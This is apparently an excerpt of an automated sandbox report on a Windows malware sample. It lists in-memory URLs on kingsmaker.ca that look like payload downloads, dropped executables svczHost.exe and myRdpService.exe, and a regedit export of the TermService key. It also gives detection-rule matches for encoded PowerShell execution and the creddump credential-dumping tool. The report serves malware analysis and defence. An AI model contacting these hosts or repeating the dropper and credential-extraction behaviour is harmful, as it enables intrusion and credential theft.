        Source: powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
        Source: myRdpService.exeString found in binary or memory: http://www.gstatic.com/generate_204
        Source: svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
        Source: myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
        Source: myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz
        Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5664D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B558EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD003D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca
        Source: powershell.exe, 00000001.00000002.3166238726.000001C838D32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3078261639.0000015B6DCC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/
        Source: powershell.exe, 00000001.00000002.3090409708.000001C8224F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C821C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5
        Source: powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde650
        Source: powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C822CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b6043
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd7
        Source: powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7ad
        Source: svczHost.exe, 00000010.00000002.4401647954.00000252B682A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/79
        Source: svczHost.exe, 00000010.00000002.4401647954.00000252B682A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/79h
        Source: powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e7
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa667424
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db11
        Source: powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a
        Source: powershell.exe, 00000001.00000002.3090409708.000001C822523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/c9af
        Source: powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd22
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb
        Source: powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49761 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService

        System Summary

        barindex
        Source: amsi64_5936.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 41.2.myRdpService.exe.7ff63b7a0000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: Process Memory Space: myRdpService.exe PID: 5496, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC454FA0821_2_00007FFC454FA082
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC454F92D61_2_00007FFC454F92D6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFC454E4E6A5_2_00007FFC454E4E6A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFC454E126A5_2_00007FFC454E126A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC455B39AF9_2_00007FFC455B39AF
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC455B24F89_2_00007FFC455B24F8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFC454F855220_2_00007FFC454F8552
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFC454F77A620_2_00007FFC454F77A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC454FBC5124_2_00007FFC454FBC51
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 47_2_00007FFC454F0E8547_2_00007FFC454F0E85
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 47_2_00007FFC454F0F0947_2_00007FFC454F0F09
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 6D42E3ACF08D81CC6B47693E0A38B22A59B15BB904AEAA914775356CF531FC90
        Source: svczHost.exe.9.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3675
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3628
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3675Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3628Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: amsi64_5936.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 41.2.myRdpService.exe.7ff63b7a0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: Process Memory Space: myRdpService.exe PID: 5496, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CMD;.VBS;.VBP
        Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@86/146@3/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9864:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9512:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9468:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9716:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:10040:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9856:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2840:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
        Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9856:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2840:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:10040:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7676:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9512:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:304:WilStaging_02
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9716:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9468:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9864:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:304:WilStaging_02
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bthmqp3g.vjp.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
